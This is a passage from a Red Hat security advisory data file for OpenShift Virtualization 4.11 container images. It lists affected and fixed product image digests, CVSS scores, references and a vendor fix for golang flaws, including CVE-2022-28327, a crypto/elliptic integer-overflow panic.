"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: crash in a golang.org/x/crypto/ssh server", }, { cve: "CVE-2022-28327", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-04-21T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2077689", }, ], notes: [ { category: "description", text: "An integer overflow flaw was found in Golang's crypto/elliptic library. This flaw allows an attacker to use a crafted scaler input longer than 32 bytes, causing P256().ScalarMult or P256().ScalarBaseMult to panic, leading to a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/elliptic: panic caused by oversized scalar", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 7, 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16-golang & go-toolset-1.17-golang), ships the vulnerable code and affected by this vulnerability.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-28327", }, { category: "external", summary: "RHBZ#2077689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2077689", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-28327", url: "https://www.cve.org/CVERecord?id=CVE-2022-28327", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-28327", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-28327", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", url: "https://groups.google.com/g/golang-announce/c/oecdBNLOml8", }, ], release_date: "2022-04-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", 